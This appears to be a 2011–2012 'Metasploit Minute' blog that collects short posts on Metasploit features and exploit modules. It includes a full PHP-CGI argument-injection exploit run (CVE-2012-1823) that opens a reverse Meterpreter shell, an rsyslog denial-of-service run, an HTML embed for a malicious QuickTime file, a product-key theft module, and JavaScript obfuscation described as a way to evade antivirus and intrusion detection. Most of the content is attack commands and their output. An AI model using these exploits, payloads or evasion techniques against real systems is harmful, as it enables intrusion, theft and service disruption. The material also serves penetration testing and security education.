Metasploit Minute

Feature: find pidsDisclosure Date: Jan 01 1970 Source: (LINK)CVE Details: http://www.cvedetails.com/cve-details.php?cve_id=CVE-Module Author(s):Bug Info: (LINK)Module Info:Block quoted text for Module 'info'Pre based Demo CodeClosing Remarks

2012-10-22T23:46:00.001-04:00

TL;DR: New ability to search through process list with added arguments to Meterpreter's 'ps' command

Disclosure Date: Oct 22 2012
Source: https://github.com/rapid7/metasploit-framework/commit/4f9385aab13245d4fdd741aacd004a5129c28db6
Module Author(s): theLightcosine
'ps' command's new arguments

meterpreter > ps -h
Use the command with no arguments to see all running processes.
The following options can be used to filter those results:

OPTIONS:

    -A   Filters processes on architecture (x86 or x86_64)
    -S   Filters processes on the process name using the supplied RegEx
    -U   Filters processes on the user using the supplied RegEx
    -h        Help menu.
    -s        Show only SYSTEM processes

Demo '-s' for only SYSTEM processes

meterpreter > ps -s
Filtering on SYSTEM processes...

Process List
============

 PID   PPID  Name               Arch  Session  User                 Path
 ---   ----  ----               ----  -------  ----                 ----
 4     0     System             x86   0        NT AUTHORITY\SYSTEM
 412   4     smss.exe           x86   0        NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
 452   852   TPAutoConnSvc.exe  x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
 776   412   csrss.exe          x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\csrss.exe
 800   412   winlogon.exe       x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\winlogon.exe
 852   800   services.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\services.exe
 864   800   lsass.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\lsass.exe
 1028  852   vmacthlp.exe       x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 1040  852   svchost.exe        x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\svchost.exe
 1248  852   svchost.exe        x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
 1612  852   spoolsv.exe        x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\spoolsv.exe
 1636  436   rundll32.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\rundll32.exe
 1988  852   vmtoolsd.exe       x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 3432  1636  notepad.exe        x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\notepad.exe
 3716  1636  notepad.exe        x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\notepad.exe

Demo '-S' for RegEx searching process names

meterpreter > ps -S winlogon
Filtering on process name...

Process List
============

 PID  PPID  Name          Arch  Session  User                 Path
 ---  ----  ----          ----  -------  ----                 ----
 800  412   winlogon.exe  x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\winlogon.exe


meterpreter > ps -S system32
Filtering on process name...
No running processes were found.
meterpreter >

Demo '-U' for RegEx searching user names (and subsequently domains)

meterpreter > ps -U PROJECTMENTOR
Filtering on user name...

Process List
============

 PID   PPID  Name                Arch  Session  User                Path
 ---   ----  ----                ----  -------  ----                ----
 200   2020  newsid.exe          x86   0        PROJECTMENTOR\jdoe  C:\Documents and Settings\Administrator\Desktop\newsid.exe
 504   1832  TNAGVK~1.EXE        x86   0        PROJECTMENTOR\jdoe  C:\DOCUME~1\jdoe\LOCALS~1\Temp\IXP001.TMP\TNAGVK~1.EXE
 600   2020  vmtoolsd.exe        x86   0        PROJECTMENTOR\jdoe  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 672   2020  Sc322.exe           x86   0        PROJECTMENTOR\jdoe  C:\Documents and Settings\jdoe\Desktop\Sc322.exe
 1172  1040  wfcrun32.exe        x86   0        PROJECTMENTOR\jdoe  C:\Program Files\Citrix\ICA Client\wfcrun32.exe
 1280  2020  concentr.exe        x86   0        PROJECTMENTOR\jdoe  C:\Program Files\Citrix\ICA Client\concentr.exe
 1320  2020  cmd.exe             x86   0        PROJECTMENTOR\jdoe  C:\WINDOWS\system32\cmd.exe

Custom UserAgents and ServerName HTTP Headers for HTTP(S) Meterpreter

2012-07-08T02:43:00.001-04:00

TL;DR: On June 26th 2012 a post by Sherif Eldeeb taught how to change the User Agent and Server header used inside of Meterpreter. This functionality is now in trunk.

Disclosure Date: June 26th 2012
Source: https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7
Author(s): Sherif Eldeeb and HD Moore
Info: http://eldeeb.net/wrdprs/?p=71

Initial connections have no User Agent:

If you do a "show advanced" you can see the settings to change for how the Meterpreter payload is supposed to talk:

And on the wire once it's been set (or in this case left as default):

CVE 2012-1823 PHP-CGI Bug

2012-05-03T22:30:00.001-04:00

TL;DR: The bug is two fold, first using a "?-s" after a php file you can read the source of the file. Second with the "?-d" you can make some temporary changes to the execution of php, whereby leading to code execution.

Disclosure Date: Feb 23 2012
Source: http://goo.gl/0L4aK
CVE Details: http://www.cvedetails.com/cve-details.php?cve_id=CVE-2012-1823
Module Author(s): egyp7, hdm
Bug Info: http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

Module Info:

When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: "if there is NO unescaped ‘=’ in the query string, the string is split on ‘+’ (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the “encoded in a system-defined manner” from the RFC) and then passes them to the CGI binary."

msf  exploit(php_cgi_arg_injection) > info

       Name: PHP CGI Argument Injection
     Module: exploit/unix/webapp/php_cgi_arg_injection
    Version: $Revision$
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  egypt 
  hdm 

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        Use a proxy chain
  RHOST      192.168.1.100    yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /index.php       no        The URI to request
  VHOST                       no        HTTP server virtual host

Payload information:
  Space: 262144

Description:
  When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable 
  to an argument injection vulnerability. This module takes advantage 
  of the -d flag to set php.ini directives to achieve code execution. 
  From the advisory: "if there is NO unescaped ‘=’ in the query 
  string, the string is split on ‘+’ (encoded space) characters, 
  urldecoded, passed to a function that escapes shell metacharacters 
  (the “encoded in a system-defined manner” from the RFC) and then 
  passes them to the CGI binary."

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1823
  http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

msf  exploit(php_cgi_arg_injection) > show payloads

Compatible Payloads
===================

   Name                         Disclosure Date  Rank    Description
   ----                         ---------------  ----    -----------
   generic/custom                                normal  Custom Payload
   generic/shell_bind_tcp                        normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                     normal  Generic Command Shell, Reverse TCP Inline
   php/bind_perl                                 normal  PHP Command Shell, Bind TCP (via perl)
   php/bind_perl_ipv6                            normal  PHP Command Shell, Bind TCP (via perl) IPv6
   php/bind_php                                  normal  PHP Command Shell, Bind TCP (via php)
   php/bind_php_ipv6                             normal  PHP Command Shell, Bind TCP (via php) IPv6
   php/download_exec                             normal  PHP Executable Download and Execute
   php/exec                                      normal  PHP Execute Command 
   php/meterpreter/bind_tcp                      normal  PHP Meterpreter, Bind TCP Stager IPv6
   php/meterpreter/reverse_tcp                   normal  PHP Meterpreter, PHP Reverse TCP stager
   php/meterpreter_reverse_tcp                   normal  PHP Meterpreter, Reverse TCP Inline
   php/reverse_perl                              normal  PHP Command, Double reverse TCP connection (via perl)
   php/reverse_php                               normal  PHP Command Shell, Reverse TCP (via php)

msf  exploit(php_cgi_arg_injection) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLAOD => php/meterpreter/reverse_tcp
msf  exploit(php_cgi_arg_injection) > show options

Module options (exploit/unix/webapp/php_cgi_arg_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.100    yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /index.php       no        The URI to request
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.101    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


^Cmsf  exploit(php_cgi_arg_injection) > set LPORT 443
LPORT => 443
msf  exploit(php_cgi_arg_injection) > exploit

[*] Started reverse handler on 192.168.1.101:443 
"/index.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"
[*] Sending stage (38791 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.101:443 -> 192.168.1.100:57139) at 2012-05-03 18:42:39 -0400

meterpreter > getuid
Server username: www-data (33)

meterpreter >

To create a demo box of your own you can simply install php5-cgi from your favorite package manager, throw a php file into /var/www and a2dismod php5 (disable regular php). No other setup needed.

List function addresses in import table r13704

2011-09-15T12:52:00.000-04:00

TL;DR: Actually sinn3r explained it great in the issue ticket used to track the change HERE - here is the text:

This diff adds the ability to show all the function addresses found in the import table of a win binary, which is helpful during the ROP part in exploit dev.
One thing I need to point out is that the modified code no longer uses Rex::PeParsey::Pe to dump the import table, because that object doesn't seem to give me any information on the function offsets (that's what I need to calculate the address). All I get is the function name, the ordinal, and the library it belongs to. So instead, it uses Metasm::COFF::ImportDirectory.

Source: http://dev.metasploit.com/redmine/projects/framework/repository/revisions/13704
Module Author(s): sinn3r

Before: ./msfpescan -i bob.exe

Imported Functions
==================

Library       Ordinal  Name
-------       -------  ----
MSVCRT.dll    275      _iob
MSVCRT.dll    202      _except_handler3
MSVCRT.dll    129      __set_app_type
MSVCRT.dll    111      __p__fmode
MSVCRT.dll    106      __p__commode
MSVCRT.dll    157      _adjust_fdiv
MSVCRT.dll    131      __setusermatherr
MSVCRT.dll    271      _initterm
MSVCRT.dll    88       __getmainargs
MSVCRT.dll    100      __p___initenv
MSVCRT.dll    72       _XcptFilter
MSVCRT.dll    211      _exit
MSVCRT.dll    390      _onexit
MSVCRT.dll    85       __dllonexit
MSVCRT.dll    707      strrchr
MSVCRT.dll    744      wcsncmp
MSVCRT.dll    179      _close

After: ./msfpescan -i bob.exe

Imported Functions
==================

Library       Address     Ordinal  Name
-------       -------     -------  ----
MSVCRT.dll    0x0040c0c8  275      _iob
MSVCRT.dll    0x0040c0cc  202      _except_handler3
MSVCRT.dll    0x0040c0d0  129      __set_app_type
MSVCRT.dll    0x0040c0d4  111      __p__fmode
MSVCRT.dll    0x0040c0d8  106      __p__commode
MSVCRT.dll    0x0040c0dc  157      _adjust_fdiv
MSVCRT.dll    0x0040c0e0  131      __setusermatherr
MSVCRT.dll    0x0040c0e4  271      _initterm
MSVCRT.dll    0x0040c0e8  88       __getmainargs
MSVCRT.dll    0x0040c0ec  100      __p___initenv
MSVCRT.dll    0x0040c0f0  72       _XcptFilter
MSVCRT.dll    0x0040c0f4  211      _exit
MSVCRT.dll    0x0040c0f8  390      _onexit
MSVCRT.dll    0x0040c0fc  85       __dllonexit
MSVCRT.dll    0x0040c100  707      strrchr
MSVCRT.dll    0x0040c104  744      wcsncmp
MSVCRT.dll    0x0040c108  179      _close

Add ability to store loot with service objects r13695

2011-09-15T01:09:00.001-04:00

TL;DR: This change allows module writers / post and otherwise / the ability to specify the a specific service type (note this is not tied to a port) to a loot item. While this a small change, it's a very important one, keep an eye out for more things to be tied to services and leveraging that data in the future.

Source: http://dev.metasploit.com/redmine/projects/framework/repository/revisions/13695

We don't have any examples of this yet (if you know of some please point them out), but it's certainly a change to keep in the back of your head.

CVE 2011-0257 Apple QuickTime PICT PnSize Buffer Overflow r13691

2011-09-05T03:26:00.003-04:00

TL;DR: This module creates a malicious MOV file that can be served up for a client side exploit. It can be embeded with the <object> HTML tag as so:

<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" codebase="http://www.apple.com/qtactivex/qtplugin.cab" height="0" width="0">
<param name="src" value="msf.mov">
<param name="autoplay" value="true">
<param name="type" value="video/quicktime" height="0" width="0">
<embed src="msf.mov" height="0" width="0" autoplay="true" type="video/quicktime" pluginspage="http://www.apple.com/quicktime/download/">
</object>

or planted via usb, or network share, or emailed.

Disclosure Date: Aug 08 2011
Source: http://dev.metasploit.com/redmine/projects/framework/repository/revisions/13691
CVE Details: http://www.cvedetails.com/cve-details.php?cve_id=CVE-2011-0257
Bug Info: http://www.securityfocus.com/bid/49144
Module Author(s): MC

Targets: Windows XP SP3 - QuickTime.qts 7.60.92.0

Module Info:

This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0.
When opening a .mov file containing a specially crafted PnSize value, an attacker
may be able to execute arbitrary code.

Usage:

msf > use exploit/windows/fileformat/apple_quicktime_pnsize
msf  exploit(apple_quicktime_pnsize) > show options

Module options (exploit/windows/fileformat/apple_quicktime_pnsize):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.mov          no        The file name.


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3


msf  exploit(apple_quicktime_pnsize) >

Windows Gather Product Key r13686

2011-09-03T01:50:00.000-04:00

TL;DR Very simple module that extracts the Windows product key from the registry. There is currently a bit of a hitch with this module and other modules like it where you need to be in a process that matches the architecture of the system (x64/x86) when reading registry keys of that architecture.

Author: 'Brandon Perry'
Source: http://dev.metasploit.com/redmine/projects/framework/repository/revisions/13686

Running while in a x86 process on a x64 system:

meterpreter > run post/windows/gather/enum_ms_product_keys 

[*] Finding Microsoft key on DEMOBOX
meterpreter >

You can see the meterpreter can't even see the 'DigitalProductId' registry value:

meterpreter > reg enumkey -k "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion"
Enumerating: HKLM\Software\Microsoft\Windows NT\CurrentVersion

  Keys ():

  Values (17):

	CurrentVersion
	CurrentBuild
	SoftwareType
	CurrentType
	InstallDate
	RegisteredOrganization
	RegisteredOwner
	SystemRoot
	InstallationType
	EditionID
	ProductName
	CurrentBuildNumber
	BuildLab
	BuildLabEx
	BuildGUID
	CSDBuildNumber
	PathName

meterpreter >

But run on the same box in a 64bit process (simply by migrating into one):

meterpreter > run post/windows/gather/enum_ms_product_keys 

[*] Finding Microsoft key on DEMOBOX

Keys
====

 Product             Registered Owner  Registered Organization  License Key
 -------             ----------------  -----------------------  -----------
 Windows 7 Ultimate  Admin                                      XXXXX-XXXXX-XXXXX-XXXXX-XXXXX


[*] Keys stored in: .msf4/loot/xxx_default_192.168.1.222_host.ms_keys_137257.txt
meterpreter > background
msf  exploit(psexec) > use post/windows/gather/enum_ms_product_keys 
msf  post(enum_ms_product_keys) > show options

Module options (post/windows/gather/enum_ms_product_keys):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf  post(enum_ms_product_keys) > run

CVE 2011-3200 rsyslog Long Tag Off-By-Two DoS r13681

2011-09-03T00:52:00.000-04:00

TL;DR: This module is pretty simple, it causes a denial of service in RSYSLOG servers running on port 512 by sending a malformed RFC3164 (syslog rfc) packet. The malformed packet looks like this:

<174>#########(imagine 512 of these)#########:

Disclosure Date: Sep 01 2011

Source: http://dev.metasploit.com/redmine/projects/framework/repository/revisions/13681

CVE Details: http://www.cvedetails.com/cve-details.php?cve_id=CVE-2011-3200

Bug Info:

Module Info:

This module triggers an off-by-two stack overflow in the
rsyslog daemon. This flaw is unlikely to yield code execution
but is effective at shutting down a remote log daemon. This bug
was introduced in version 4.6.0 and corrected in 4.6.8/5.8.5.
Compiler differences may prevent this bug from causing any
noticeable result on many systems (RHEL6 is affected).

msf > use auxiliary/dos/syslog/rsyslog_long_tag 
msf  auxiliary(rsyslog_long_tag) > show options

Module options (auxiliary/dos/syslog/rsyslog_long_tag):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  514              yes       The target port

msf  auxiliary(rsyslog_long_tag) > set RHOST 192.168.1.144
RHOST => 192.168.1.144
msf  auxiliary(rsyslog_long_tag) > run

[*] Sending message containing a malformed RFC3164 tag to 192.168.1.144
[*] Auxiliary module execution completed
msf  auxiliary(rsyslog_long_tag) >

And down she goes...

JS Obfuscation Backwards Compatibility Support r13674

2011-09-02T09:43:00.000-04:00

Recently heaplib.rb has gone through some changes in an effort to make the code more efficient. When used in conjunction with the new JSObfu obfuscator for javascript heaplib would first obfuscate the javascript using the old method and return it to the exploit which asked for it. The exploit would then re-obfuscate the javascript in most cases using the new methods. This means obfuscation occurred twice.

Options were added to heaplib so that developers can specify which type of obfuscation to use, no obfuscation, the new JSObfu method, or the old method. If no option is specified heaplib defaults to the old method which is what older exploits expect. The addition of an opts hash to the heaplib API makes it much more flexible for developers and allows for more efficient code to be produced.

The following shows examples in irb depicting the two obfuscation options in action.

The old method:
>> js = Rex::Exploitation::ObfuscateJS.new("var foo = 'Hello, world';", 'Symbols' => {'Variables' => [ 'foo' ]}, 'Strings' => true)
=> #true, "Symbols"=>{"Namespaces"=>[], "Variables"=>["foo"], "Methods"=>[], "Classes"=>[]}}, @js="var foo = 'Hello, world';">
>> js.obfuscate
=> "var YVRBdkTEwKoueFsTGqSvehyCHm = unescape(\"%48%65%6c%6c%6f%2c%20%77%6f%72%6c%64\");"

The new method:
>> js = "var a = 1+2;"
=> "var a = 1+2;"
>> js = Rex::Exploitation::JSObfu.new(js)
=> #
>> js.obfuscate
=> nil
>> puts js
var ZIIDulErd = 'l'.length + 'JU'.length;
=> nil

It should be apparent the new method of obfuscation is a lot easier to use as a developer. It also does a better job of obfuscating the javascript since it uses an actual lexer to parse the javascript and extract variable names and data types. This allows it to apply multiple methods to obfuscate a single data type.

For example in the citrix_gateway_actx ActiveX clientside module starting on line 158:

Tell it not to use obfuscation (:noobfu => true) - since it uses the old method by default:
(NO OBFUscation, not Noob Fu)

spray = heaplib(spray, {:noobfu => true})

Apply the new JSObfu class to it:

spray = ::Rex::Exploitation::JSObfu.new(spray)

And run the obfuscation method on it:

spray.obfuscate

Javascript obfuscation like this helps to avoid detection by AV and IPS/IDS. It can be used anywhere you have javascript being used in your modules. Since Rex is a Ruby library not permanently tied to the Metasploit Framework, this means that you can use this obfuscation method outside of the framework as well.

CVE 2007-3068 dvdx_plf_bof r13673

2011-09-01T11:10:00.000-04:00

TL;DR This module creates a malicious PLF file in the location you specify with the 'FILENAME' parameter. Like with all 'file format' modules it is up to you to find a way to get the malicious payload to the target.

Disclosure Date: Jun 02 2007

Source: https://dev.metasploit.com/redmine/projects/framework/repository/revisions/13673
CVE Details: http://cvedetails.com/cve-details.php?t=1&cve_id=CVE+2007-3068

Info:

This module exploits a stack-based buffer overflow on DVD X Player
5.5 Pro and Standard. By supplying a long string of data in a plf
file (playlist), the MediaPlayerCtrl.dll component will attempt to
extract a filename out of the string, and then copy it on the stack
without any proper bounds checking, which casues a buffer overflow,
and results arbitrary code execution under the context of the user.
This module has been designed to target common Windows systems such
as: Windows XP SP2/SP3, Windows Vista, and Windows 7.

URL: http://www.exploit-db.com/exploits/17745

Targets available in module currently:

DVD X Player 5.5 Standard or Pro

msf > use exploit/windows/fileformat/dvdx_plf_bof
msf  exploit(dvdx_plf_bof) > show options

Module options (exploit/windows/fileformat/dvdx_plf_bof):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.plf          no        The file name


Exploit target:

   Id  Name
   --  ----
   0   DVD X Player 5.5 Standard / Pro

CVE 2011-2882 citrix_gateway_actx r13666

2011-08-31T11:09:00.000-04:00

TL;DR This module hosts an ActiveX Control on the SRVPORT via the URIPATH (so http://attacker:8080/X5vt52 ) if you leave the defaults. The will work on anyone who has the ActiveX Control installed as long as you can get them to surf to the page. on SRVPORT

Disclosure Date: Jul 14 2011

Source: https://dev.metasploit.com/redmine/projects/framework/repository/revisions/13666
CVE Details: http://cvedetails.com/cve-details.php?t=1&cve_id=CVE+2011-2882

Info:

This module exploits a stack based buffer overflow in the Citrix Gateway ActiveX control. Exploitation of this vulnerability requires user interaction. The victim must click a button in a dialog to begin a scan. This is typical interaction that users should be accustom to.
Exploitation results in code execution with the privileges of the user who browsed to the exploit page.

URL: https://labs.idefense.com/verisign/intelligence/2009/vulnerabilities/display.php?id=929

Targets available in module currently:

IE 6 on Windows XP SP3
IE 7 on Windows XP SP3
IE 7 on Windows Vista

msf > use exploit/windows/browser/citrix_gateway_actx
msf  exploit(citrix_gateway_actx) > show options

Module options (exploit/windows/browser/citrix_gateway_actx):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic